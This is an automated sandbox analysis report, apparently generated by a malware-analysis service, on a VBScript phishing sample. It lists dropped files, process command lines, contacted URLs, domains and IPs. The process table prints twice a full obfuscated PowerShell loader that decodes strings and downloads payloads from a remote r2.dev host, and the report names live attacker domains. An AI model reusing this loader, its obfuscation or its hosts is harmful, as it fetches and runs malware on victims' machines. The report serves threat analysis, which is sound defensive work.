Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Narudzba ACH0036173.vbe
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\204hG0L
|
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie
0x24, schema 4, UTF-8, version-valid-for 2
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hp42bak5.tc3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pdjfcuz2.eey.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pkhvrw3x.skq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rdatprk4.wnr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Nationalsocialisternes.Ska
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Narudzba ACH0036173.vbe"
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c ping 6777.6777.6777.677e
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping 6777.6777.6777.677e
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk
Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If
($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker;
for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function
Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0
Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr.
instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re
ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1
Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym
sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE
GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/
Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev
kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S
hoolb1 Thelyt. StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e.
betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank
ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali
lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n=
N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS
Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo:
NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta
glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadiofrVEmpireneMilieufr
Dknernr TeaktriBogsideGMercha i SnudesDMytedanNGruppereYoyoentSDisapprSReolplo).nravel ');Optllingslister (Spdbarnsplejerens
'.ortuga[ lucan nsa irisETftestitMe lemr.Towns dSbreakb eSstvl rRCentralV,ndskriiIndophicBisae teS kkatipPap rweoSemidanISultestNOpfindetReprsenmOatearpaunepaulNEq
iglaaInteraggNi.eaufeViablybRchar ae]Dichot.: Fea,an:tmrerlrS S anniEAlrune cFractiouProgramr MancheI Predebt Re oluydysphorpComelierDeflatioOppostiTKvgsakso
P.eudoCKildeskoPladsbiLAar ang C elat=Ansgnin Uforbed[AndrikkNHygroskEParoemitAfdmpes.arbitrasEclegmeeCitatorC ropageuEmulsi
RCh mistIBrickseT,elvklaYFaithfupEpinikiRS athelO dblsniTTeleslyoChestercunopposOAdoratol Heor ot RangewyFoolheaPbur houEAbseyhe]Linkedi:
,otiva:ReinvesTMicrospL GlyptoSFr stde1Rottegi2 Proje ');$Ekspatrieret=$Indistinctness[0];$husholdningsskoler=(Spdbarnsplejerens
' Gra.te$ PericaGJomfrubLHvelsenoGringssbCyklista Mis.ieL Affald: G dssau .ooteeNUd revnSMjavendh EtagelOFeltrkkuCentenilPleisefdUnluckiESerfsocRPackth.=SmaapennSporrenerigdo,mWbiopsie-,ukkerso
Forhanb ForereJVrke miE HonnrrcLaborabtN nconv Hvlb,kesAflggery ForskaSFurfur,tDustragEVirussymGlucina.ChammieNDesigneeCae
ardtRanker .LatticewRhi.enceTotalfobBagstrvcStai liLT.ltstaIAadredeEHiberninbun onutTweedja ');Optllingslister ($husholdningsskoler);Optllingslister
(Spdbarnsplejerens 'Noncabi$ errariUSmrb omnPenitensaeoliavh Exter.oFourberuRational Diff.sd MishmeeTungsdyr Koordi.CrackjaHTileworeunitageaKlovbredInkpotse
Yank erperceivs Jagtle[ udkaar$Newsm nRafgiv saVaarbe,iBrevposl BagtjecUnmodifaPes nterDriftstd Afsvid]Pi,dest=Tiercer$DementeSPreceptt
ungetseUd.elhea Cor.hamSlipo tbSkydemooTeknoloaHypercat Te.nfei KotypenTippesggBeelb,w ');$uninverted=Spdbarnsplejerens 'Uansvar$
y.mygeURedescenCryptsbs Bo boihFjordmuoCult,rouIslamabl NeurocdBrotfore Opvi,lrIldfuld.galpedeDSnaskedoEmero swUundvrlnUlg,liglLapindeoDor
micaMi,parsdtelomitF UnfiltiSkudfrilBenzog eCont ai( .rithl$IncarnaEAdffrozkNonre lsHeretripLefleroaendestat saltsgrAdgangsiSigjnereRedoingrudrangeeHarringtTo
alfr,Unimp w$VragdelFLavtrykr.ubtruneKatteurm Svrm,ttHvidtlpo Uncoven Bre aaiHjpand n SkattegSubrepte ravebrrProconsnCatty
he Blo.sosAb ulla)Dismali ';$Fremtoningernes=$Mekanismer;Optllingslister (Spdbarnsplejerens ' M ligg$DatolinGEsc rtaLRedugnyoDvrgtrebMosfeteaHydrophL
Cresco:Unblockr AtlassEHaandvrCWoadwaxk aakesfu Mocamb=Talomr (RentegntRatevise H mmelsBar,uesTProphet-FormandP ForgemaGer
niotFngselshKolofon Faneb a$MenagerFOutvo.erSalgsenEDia,reemEffektsTimitateo tomiseN Uduelii SupersNIr quoig PaaregeCharcutRLotu.blNKapelkue
U viklsInappea)Craftsp ');while (!$Recku) {Optllingslister (Spdbarnsplejerens ' Forhaa$ nakewigPa eondlHaarskmo Lovfs,b D,lstraun
ompolStor og:NeighboBBrnehavrFlygtnio EnogtylPh tohabRouma i=Tra sse$BoligkotChaouaurRedninguUnsysteeGranit ') ;Optllingslister
$uninverted;Optllingslister (Spdbarnsplejerens 'c,ndemnsDerm,toTCutweedA PalterrRaketteTSlutbem-Boremusskl,ringl NoaordE Microme.okalplpO
ybuty c,ment4Homosty ');Optllingslister (Spdbarnsplejerens 'Vegeter$ RemplaGNo jesolRaceadsoFinu.libLgebesgACebida lBou bak:OpregulR
oorepoEPalaeotCKoteriokElevatoURioting=Stamper(UnsancttVit eoue s henesKa tepotJehov.c-Muddin.P Babirua sk vritAigretsHU locom
Uncoher$SanenesFKrigshurTransmueMooningm PoikiltDolcinooLiljasgnB dkninI supranNGliblymgStrsteveCokingpr GynandNBetydeteBefstenSRinkens)Nationa
') ;Optllingslister (Spdbarnsplejerens 'Kla seb$Tir desGjrlislulGeniohyORiko.heBskjaldeaSiccarsLValgkam:O havsrP Pra esrQuinqueeU
trustl SvejseUBetv.ngxIns uciuTightlirNonin eISem conoserbokru,inkendsCorabe.NN,teforesu afflstheriomsYndeful= Svejst$ hypogegJunetteLSolbrroO
tsarkoBBestyreA Baldu.LJaspopa: KetchuFstromatL retsreJ Apolunl PrehalSMateriaBMixy kolhvepse dSprjteneGelidiaSUnctori+ umiste+,lteleg%Fo
hand$Rejser IAfdkke,NAnchoriDS,licifI Fis,eps Tilke.tStudepriSmu stiNFadtc,ccTrocharTT anspinDeturreeInvariaSTiberbrsA terud.SupranaCUngdomyoDandyliUMglin.sNUnontolTUligevg
') ;$Ekspatrieret=$Indistinctness[$Preluxuriousness];}$Defensible=328477;$Cloyment112=33710;Optllingslister (Spdbarnsplejerens
'Forsmme$KriminagTahl anlKlippenOtedeumeB SnusetAfornuftl Shastr: Z motiROchersaEHempherN vandskTBronzese JubiluN Kodakse
EkstraDskibsllSdionas tAnprisnTSprgepaEMyelapoL Sarde.SOculoc,eArmbroeNInt iga Dentif= Spilde Dygt gegPhthorfESkbnernTReallns-KursusmC
Affe toAnskaffNAlienedtForkramEEchiurinOrganistGlanspa Festone$OuttravfMis nfoRProcam E TumbleMSkyggebtRisti.goReacha.NLaughi.iDivisilN
rinserGBin ehiEGodkendRprovsteNPsywarsE Unsup SDena io ');Optllingslister (Spdbarnsplejerens ' Sphagn$Regle sgEyasesfl HeterooFarsalab
ImportaGibbo.el By one:SluttisCLiltinghSknsv seGthedspmHensaasiForha nsDeafenetImma rirSmrgaasiMorgenbe Hilstesunfavor Sjufte=
Repeti Kollabo[ DampruSFarvenhymiranhasFortrdetMalereee Stikpim Impreg. Sekte CSamfundoNonsympnKartot,vtomatrdePredaylrTarradit
aimio] Mller.: enerva:KlevareFtro ddorOphthaloSpurioumAc puncBVaabensaTykmlkssSekund eStensto6Sluggar4FremstdS coit ot BobsldrUdstykni
Waterwn,vrdfstgDiakoni(Afgang $TetrachRPostnumeChecksunjal.usitKlokkereTarriarnRegionaeOpmagasdSuccesssM,sfarvtCirkulrtEpimer
eBlegekrlPrveb lsStrutteeRkvrkernOrganis) Oransa ');Optllingslister (Spdbarnsplejerens 'Leafenr$ SortergBenignal Hfe teoBal.onfBScentleA.drtspalDygtigt:
Cura,iG CataraaMadcapsRnonexhiNDua iteimasseprsbe,adtaO AmilkanS mleobeCr.ftswr MarielErffelscsAfprvni A,sorp= orcer Napoleo[A
lagteSBaga ebY s rongStotalitT S bsideCorrodamStreg a.Undg detHel,ogretambukixPrepareTAkkiles.Forbru eSkvis.nNMobilesc JenvipOBetrenddR.gmelsIFis.ureNSteriliGRe
teno]Vandrep:Skadesl:Pa affiAWhizzerSDinoflac MusikliAbbreviiafgangs.ChestinGDiagnosE SeralbTDaggersS mult vt FrerbeRDegageri
AfmattNDomstolgHa glin(Deflati$Trringec GuldfihStereo,eansvarsm SubtleIColonopS TrodsetSid temrlic enniEndivieEPaategnScolloqu)Mopishn
');Optllingslister (Spdbarnsplejerens 'Brugers$ZonelovgBe,bexkL B.achioR ssifybDutchamaP,etiskLGelati :Photoc FKrymmelOByggereRDitrochTgu
denbi nailheDKinetog=Tilkald$ConsumeGMastereANewsletrBehandlN Skiferi Elekt s UnsmitOStrygejN ChaconeSe,vforROrganisebe,edneS
ordski.VatnissS TranspuOpank iB enmandSbunkrettReben eRIndgnidIForskniN concouGTa dlge(Obsidia$PiouslyDEnc opaE robespf ProfesEUstori.nBystecrSNachitoiGennemfBFlommenLPolsterEC.seloa,D
sfati$CenterlCTrykmaaL T kninOK.smiskYKdehandmSustente lsriv,N S uamutTilnavn1 Uov rt1clin me2Airtigh)gispede ');Optllingslister
$fortid;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk
Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If
($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker;
for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function
Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0
Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr.
instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re
ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1
Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym
sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE
GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/
Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev
kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S
hoolb1 Thelyt. StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e.
betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank
ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali
lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n=
N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS
Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo:
NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta
glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadiofrVEmpireneMilieufr
Dknernr TeaktriBogsideGMercha i SnudesDMytedanNGruppereYoyoentSDisapprSReolplo).nravel ');Optllingslister (Spdbarnsplejerens
'.ortuga[ lucan nsa irisETftestitMe lemr.Towns dSbreakb eSstvl rRCentralV,ndskriiIndophicBisae teS kkatipPap rweoSemidanISultestNOpfindetReprsenmOatearpaunepaulNEq
iglaaInteraggNi.eaufeViablybRchar ae]Dichot.: Fea,an:tmrerlrS S anniEAlrune cFractiouProgramr MancheI Predebt Re oluydysphorpComelierDeflatioOppostiTKvgsakso
P.eudoCKildeskoPladsbiLAar ang C elat=Ansgnin Uforbed[AndrikkNHygroskEParoemitAfdmpes.arbitrasEclegmeeCitatorC ropageuEmulsi
RCh mistIBrickseT,elvklaYFaithfupEpinikiRS athelO dblsniTTeleslyoChestercunopposOAdoratol Heor ot RangewyFoolheaPbur houEAbseyhe]Linkedi:
,otiva:ReinvesTMicrospL GlyptoSFr stde1Rottegi2 Proje ');$Ekspatrieret=$Indistinctness[0];$husholdningsskoler=(Spdbarnsplejerens
' Gra.te$ PericaGJomfrubLHvelsenoGringssbCyklista Mis.ieL Affald: G dssau .ooteeNUd revnSMjavendh EtagelOFeltrkkuCentenilPleisefdUnluckiESerfsocRPackth.=SmaapennSporrenerigdo,mWbiopsie-,ukkerso
Forhanb ForereJVrke miE HonnrrcLaborabtN nconv Hvlb,kesAflggery ForskaSFurfur,tDustragEVirussymGlucina.ChammieNDesigneeCae
ardtRanker .LatticewRhi.enceTotalfobBagstrvcStai liLT.ltstaIAadredeEHiberninbun onutTweedja ');Optllingslister ($husholdningsskoler);Optllingslister
(Spdbarnsplejerens 'Noncabi$ errariUSmrb omnPenitensaeoliavh Exter.oFourberuRational Diff.sd MishmeeTungsdyr Koordi.CrackjaHTileworeunitageaKlovbredInkpotse
Yank erperceivs Jagtle[ udkaar$Newsm nRafgiv saVaarbe,iBrevposl BagtjecUnmodifaPes nterDriftstd Afsvid]Pi,dest=Tiercer$DementeSPreceptt
ungetseUd.elhea Cor.hamSlipo tbSkydemooTeknoloaHypercat Te.nfei KotypenTippesggBeelb,w ');$uninverted=Spdbarnsplejerens 'Uansvar$
y.mygeURedescenCryptsbs Bo boihFjordmuoCult,rouIslamabl NeurocdBrotfore Opvi,lrIldfuld.galpedeDSnaskedoEmero swUundvrlnUlg,liglLapindeoDor
micaMi,parsdtelomitF UnfiltiSkudfrilBenzog eCont ai( .rithl$IncarnaEAdffrozkNonre lsHeretripLefleroaendestat saltsgrAdgangsiSigjnereRedoingrudrangeeHarringtTo
alfr,Unimp w$VragdelFLavtrykr.ubtruneKatteurm Svrm,ttHvidtlpo Uncoven Bre aaiHjpand n SkattegSubrepte ravebrrProconsnCatty
he Blo.sosAb ulla)Dismali ';$Fremtoningernes=$Mekanismer;Optllingslister (Spdbarnsplejerens ' M ligg$DatolinGEsc rtaLRedugnyoDvrgtrebMosfeteaHydrophL
Cresco:Unblockr AtlassEHaandvrCWoadwaxk aakesfu Mocamb=Talomr (RentegntRatevise H mmelsBar,uesTProphet-FormandP ForgemaGer
niotFngselshKolofon Faneb a$MenagerFOutvo.erSalgsenEDia,reemEffektsTimitateo tomiseN Uduelii SupersNIr quoig PaaregeCharcutRLotu.blNKapelkue
U viklsInappea)Craftsp ');while (!$Recku) {Optllingslister (Spdbarnsplejerens ' Forhaa$ nakewigPa eondlHaarskmo Lovfs,b D,lstraun
ompolStor og:NeighboBBrnehavrFlygtnio EnogtylPh tohabRouma i=Tra sse$BoligkotChaouaurRedninguUnsysteeGranit ') ;Optllingslister
$uninverted;Optllingslister (Spdbarnsplejerens 'c,ndemnsDerm,toTCutweedA PalterrRaketteTSlutbem-Boremusskl,ringl NoaordE Microme.okalplpO
ybuty c,ment4Homosty ');Optllingslister (Spdbarnsplejerens 'Vegeter$ RemplaGNo jesolRaceadsoFinu.libLgebesgACebida lBou bak:OpregulR
oorepoEPalaeotCKoteriokElevatoURioting=Stamper(UnsancttVit eoue s henesKa tepotJehov.c-Muddin.P Babirua sk vritAigretsHU locom
Uncoher$SanenesFKrigshurTransmueMooningm PoikiltDolcinooLiljasgnB dkninI supranNGliblymgStrsteveCokingpr GynandNBetydeteBefstenSRinkens)Nationa
') ;Optllingslister (Spdbarnsplejerens 'Kla seb$Tir desGjrlislulGeniohyORiko.heBskjaldeaSiccarsLValgkam:O havsrP Pra esrQuinqueeU
trustl SvejseUBetv.ngxIns uciuTightlirNonin eISem conoserbokru,inkendsCorabe.NN,teforesu afflstheriomsYndeful= Svejst$ hypogegJunetteLSolbrroO
tsarkoBBestyreA Baldu.LJaspopa: KetchuFstromatL retsreJ Apolunl PrehalSMateriaBMixy kolhvepse dSprjteneGelidiaSUnctori+ umiste+,lteleg%Fo
hand$Rejser IAfdkke,NAnchoriDS,licifI Fis,eps Tilke.tStudepriSmu stiNFadtc,ccTrocharTT anspinDeturreeInvariaSTiberbrsA terud.SupranaCUngdomyoDandyliUMglin.sNUnontolTUligevg
') ;$Ekspatrieret=$Indistinctness[$Preluxuriousness];}$Defensible=328477;$Cloyment112=33710;Optllingslister (Spdbarnsplejerens
'Forsmme$KriminagTahl anlKlippenOtedeumeB SnusetAfornuftl Shastr: Z motiROchersaEHempherN vandskTBronzese JubiluN Kodakse
EkstraDskibsllSdionas tAnprisnTSprgepaEMyelapoL Sarde.SOculoc,eArmbroeNInt iga Dentif= Spilde Dygt gegPhthorfESkbnernTReallns-KursusmC
Affe toAnskaffNAlienedtForkramEEchiurinOrganistGlanspa Festone$OuttravfMis nfoRProcam E TumbleMSkyggebtRisti.goReacha.NLaughi.iDivisilN
rinserGBin ehiEGodkendRprovsteNPsywarsE Unsup SDena io ');Optllingslister (Spdbarnsplejerens ' Sphagn$Regle sgEyasesfl HeterooFarsalab
ImportaGibbo.el By one:SluttisCLiltinghSknsv seGthedspmHensaasiForha nsDeafenetImma rirSmrgaasiMorgenbe Hilstesunfavor Sjufte=
Repeti Kollabo[ DampruSFarvenhymiranhasFortrdetMalereee Stikpim Impreg. Sekte CSamfundoNonsympnKartot,vtomatrdePredaylrTarradit
aimio] Mller.: enerva:KlevareFtro ddorOphthaloSpurioumAc puncBVaabensaTykmlkssSekund eStensto6Sluggar4FremstdS coit ot BobsldrUdstykni
Waterwn,vrdfstgDiakoni(Afgang $TetrachRPostnumeChecksunjal.usitKlokkereTarriarnRegionaeOpmagasdSuccesssM,sfarvtCirkulrtEpimer
eBlegekrlPrveb lsStrutteeRkvrkernOrganis) Oransa ');Optllingslister (Spdbarnsplejerens 'Leafenr$ SortergBenignal Hfe teoBal.onfBScentleA.drtspalDygtigt:
Cura,iG CataraaMadcapsRnonexhiNDua iteimasseprsbe,adtaO AmilkanS mleobeCr.ftswr MarielErffelscsAfprvni A,sorp= orcer Napoleo[A
lagteSBaga ebY s rongStotalitT S bsideCorrodamStreg a.Undg detHel,ogretambukixPrepareTAkkiles.Forbru eSkvis.nNMobilesc JenvipOBetrenddR.gmelsIFis.ureNSteriliGRe
teno]Vandrep:Skadesl:Pa affiAWhizzerSDinoflac MusikliAbbreviiafgangs.ChestinGDiagnosE SeralbTDaggersS mult vt FrerbeRDegageri
AfmattNDomstolgHa glin(Deflati$Trringec GuldfihStereo,eansvarsm SubtleIColonopS TrodsetSid temrlic enniEndivieEPaategnScolloqu)Mopishn
');Optllingslister (Spdbarnsplejerens 'Brugers$ZonelovgBe,bexkL B.achioR ssifybDutchamaP,etiskLGelati :Photoc FKrymmelOByggereRDitrochTgu
denbi nailheDKinetog=Tilkald$ConsumeGMastereANewsletrBehandlN Skiferi Elekt s UnsmitOStrygejN ChaconeSe,vforROrganisebe,edneS
ordski.VatnissS TranspuOpank iB enmandSbunkrettReben eRIndgnidIForskniN concouGTa dlge(Obsidia$PiouslyDEnc opaE robespf ProfesEUstori.nBystecrSNachitoiGennemfBFlommenLPolsterEC.seloa,D
sfati$CenterlCTrykmaaL T kninOK.smiskYKdehandmSustente lsriv,N S uamutTilnavn1 Uov rt1clin me2Airtigh)gispede ');Optllingslister
$fortid;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe
|
"C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe"
|
|
|
|
C:\Windows\SysWOW64\msinfo32.exe
|
"C:\Windows\SysWOW64\msinfo32.exe"
|
|
|
|
C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe
|
"C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe"
|
|
|
|
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 3 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://www.casesrep.site/7z6q/
|
84.32.84.32
|
|
|
|
https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/nedkoge.msoP
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/nedkoge.mso
|
162.159.140.237
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/BEkfITzYaj231.bin$Y
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev
|
unknown
|
||
|
https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/
|
unknown
|
||
|
https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/BEkfITzYaj231.bin
|
162.159.140.237
|
||
|
https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/BEkfITzYaj231.bing
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/M
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.kuaimaolife.shop/80e1/
|
38.55.251.233
|
||
|
https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/BEkfITzYaj231.binE
|
unknown
|
||
|
https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/nedkoge.msoXR
|
unknown
|
There are 15 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
casesrep.site
|
84.32.84.32
|
|
|
|
www.casesrep.site
|
unknown
|
|
|
|
6777.6777.6777.677e
|
unknown
|
|
|
|
pub-2f7d07153ea1403184d62266d9c28e41.r2.dev
|
162.159.140.237
|
||
|
www.kuaimaolife.shop
|
38.55.251.233
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
84.32.84.32
|
casesrep.site
|
Lithuania
|
|
|
|
162.159.140.237
|
pub-2f7d07153ea1403184d62266d9c28e41.r2.dev
|
United States
|
||
|
38.55.251.233
|
www.kuaimaolife.shop
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
